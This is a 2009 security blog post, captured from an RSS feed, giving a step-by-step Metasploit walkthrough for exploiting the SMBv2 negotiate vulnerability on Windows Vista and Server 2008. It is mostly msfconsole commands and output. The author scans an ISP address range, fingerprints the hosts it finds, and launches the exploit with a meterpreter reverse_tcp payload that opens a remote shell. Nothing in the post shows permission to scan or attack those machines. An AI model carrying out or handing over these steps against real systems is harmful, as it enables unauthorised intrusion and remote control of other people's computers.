Abysssec Security Researches » Uncategorized http://www.abysssec.com/blog Security Researches , Advisories , Coding , Projects , Reversing , Exploitation , Fuzzing Fri, 14 May 2010 19:22:59 +0000 en hourly 1 http://wordpress.org/?v=abc Exploiting Vista / 2008 Using SMBV2 Exploit http://www.abysssec.com/blog/2009/10/exploiting-vista-2008-using-smbv2-exploit/ http://www.abysssec.com/blog/2009/10/exploiting-vista-2008-using-smbv2-exploit/#comments Fri, 02 Oct 2009 15:37:10 +0000 shahin http://www.abysssec.com/blog/?p=404 hello all

in a few recent days i worked on smbv2 ProcessID Function Table Dereference vulnerability and after lots of work actually i got my shell after kostya and rest of Immunity. but there is a good news for you Stephen Fewer finally released his exploit for metasploit too.

a note : stephen exploit is no so reliable refer to selecting address in HAL  but it’s free …

metasploit 3.3 DEV have this module by default .

and here are steps for exploitation using metasploit

step 0:

run msfconsole.bat

step 1 :

scanning for targets
msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS xx.xx.xx.x-xx.xx.xx.254
RHOSTS =>xx.xx.xx.x-xx.xx.xx.254
msf auxiliary(smb2) > set THREADS 50
THREADS => 50
msf auxiliary(smb2) > run

for example i found on my ADSL range  :

[*] xx.xx.xx.x supports SMB 2 [dialect 255.2] and has been online for 285 hours

step 2 :

now you need check version of founded target (i think it’s better to know before send your exploit)

msf auxiliary(smb2) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7100) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x  is running Windows 7 Ultimate (Build 7229) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows Vista Home Basic Service Pack 2 (language: Unknown)
[*] Auxiliary module execution completed

as you may noticed i just found one windows vista and two others are windows 7 .this exploit will work against vista sp1-2 and windows 2008 (not rc2)

step 3 :

now you can set and send exploit

msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
set msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set LHOST xx.xx.xx.x
LHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > set RHOST xx.xx.xx.x
RHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > exploit

and here is output of metasploit exploit on my target :

note : i will try to have a technical detail post  for exploitation and also my version of exploit for you soon.

happy hunting

shahin

xx.xx.xx.x
]]> http://www.abysssec.com/blog/2009/10/exploiting-vista-2008-using-smbv2-exploit/feed/ 0